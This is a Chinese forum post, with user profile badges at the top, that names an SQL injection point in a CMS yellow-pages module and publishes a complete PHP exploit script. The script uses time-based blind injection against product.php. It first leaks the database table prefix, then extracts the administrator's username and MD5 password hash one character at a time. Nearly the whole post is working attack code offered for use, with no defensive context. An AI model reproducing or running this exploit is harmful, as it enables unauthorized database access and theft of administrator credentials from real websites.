data:image/s3,"s3://crabby-images/eca9f/eca9f2f56c05c552c853355d850e1be1b77847b1" alt="Rank: 15" data:image/s3,"s3://crabby-images/eca9f/eca9f2f56c05c552c853355d850e1be1b77847b1" alt="Rank: 15" data:image/s3,"s3://crabby-images/eca9f/eca9f2f56c05c552c853355d850e1be1b77847b1" alt="Rank: 15" data:image/s3,"s3://crabby-images/d1faa/d1faa948cbc21e6e1634b0d994d9daf499ed9fa0" alt="Rank: 15" data:image/s3,"s3://crabby-images/55d42/55d42d19a311950367b6865f5dcfa0ed433eaef9" alt="Rank: 15"
- 帖子
- 3852
- 积分
- 13044
- 威望
- 16780
- 金钱
- 36761
- 在线时间
- 1139 小时
data:image/s3,"s3://crabby-images/4732a/4732a86c86fd37ff85e553f122d614c7ccbe00a5" alt="管理组 管理组" data:image/s3,"s3://crabby-images/9ae68/9ae686c72fd588bd7968d64fc16b8b60a73761c2" alt="高手勋章 高手勋章" data:image/s3,"s3://crabby-images/098ce/098ced5e61263a3e4d5f4108f37d875e10fcdbb2" alt="核心成员 核心成员" data:image/s3,"s3://crabby-images/e6314/e631450ec076e04beca50708b36d5c815d6e95e6" alt="原创奖章 原创奖章" data:image/s3,"s3://crabby-images/ccea7/ccea754c16c006eaac7a96f5b73f0d004d0ccb45" alt="帅哥勋章 帅哥勋章" data:image/s3,"s3://crabby-images/55154/551549a43b8b41730409c4a970b2358b5153ff45" alt="突出贡献奖 突出贡献奖" data:image/s3,"s3://crabby-images/63d52/63d5297982a03d194afcb13981f3232a383b8e34" alt="优质人品奖章 优质人品奖章" data:image/s3,"s3://crabby-images/b23b3/b23b3fed8495e8121d3d2728c95aaa8a3246c2e7" alt="论坛元老 论坛元老" data:image/s3,"s3://crabby-images/ad595/ad5951204df425fe3a00c0711513481a8b68a2ce" alt="管理组成员 管理组成员" data:image/s3,"s3://crabby-images/0b534/0b5349fc17d5e03b07feb7e4030f01eec8845c2a" alt="技术组成员 技术组成员"
|
注射漏洞所在处:
yp/company.php?where=%23
EXP如下:
<?php
ini_set("max_execution_time",0);
error_reporting(7);
function usage()
{
global $argv;
exit(
"\n[+] Usage : php ".$argv[0]." <hostname> <path>".
"\n[+] Ex. : php ".$argv[0]." localhost /yp".
"\n\n");
}
function query($pos, $chr, $chs)
{
global $prefix;
switch ($chs){
case 1:
$query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
break;
case 2:
$query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
break;
case 3:
$query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";
break;
}
$query = str_replace(" ", "/**/", $query);
$query = urlencode($query);
return $query;
}
function exploit($hostname, $path, $pos, $chr, $chs)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);
$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);
$message = "POST ".$path."/product.php HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $hostname\r\n";
$message .= "Content-Length: ".strlen($postdata)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $postdata;
//echo $message;
$time_a = time();
fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);
$time_b = time();
fclose($conn);
//echo $time_b - $time_a."\r\n";
if ($time_b - $time_a > 4)
return true;
else
return false;
}
function crkusername($hostname, $path, $chs)
{
global $length;
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$chr = 0;
$pos = 1;
echo "[+] username: ";
while ($pos <= $length)
{
if (exploit($hostname, $path, $pos, $key[$chr], $chs))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}
function crkpassword($hostname, $path, $chs)
{
$key = "abcdef0123456789";
$chr = 0;
$pos = 1;
echo "[+] password: ";
while ($pos <= 32)
{
if (exploit($hostname, $path, $pos, $key[$chr], $chs))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n\n";
}
function lengthcolumns($hostname, $path, $chs)
{
echo "[+] username length: ";
$exit = 0;
$length = 0;
$pos = 0;
$chr = 0;
while ($exit==0)
{
if (exploit($hostname, $path, $pos, $chr, $chs))
{
$exit = 1;
$length = $pos;
}
else
$pos++;
}
echo $length."\n";
return $length;
}
function getprefix($hostname, $path)
{
echo "[+] prefix: ";
$conn = fsockopen($hostname, 80);
$request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";
$request .= "Host: {$hostname}\r\n";
$request .= "Connection: Close\r\n\r\n";
fputs($conn, $request);
while (!feof($conn))
$reply .= fgets($conn, 1024);
fclose($conn);
preg_match(''/FROM `(.+)yp_product/ie'',$reply,$match);
if ($match[1])
return $match[1];
else
return false;
}
if ($argc != 3)
usage();
$prefix="";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path);
if ($prefix)
{
echo $prefix."\r\n";
$length = lengthcolumns($hostname, $path, 3);
crkusername($hostname, $path, 1);
crkpassword($hostname, $path, 2);
}
else
{
exit("Exploit failed");
}
?> |
|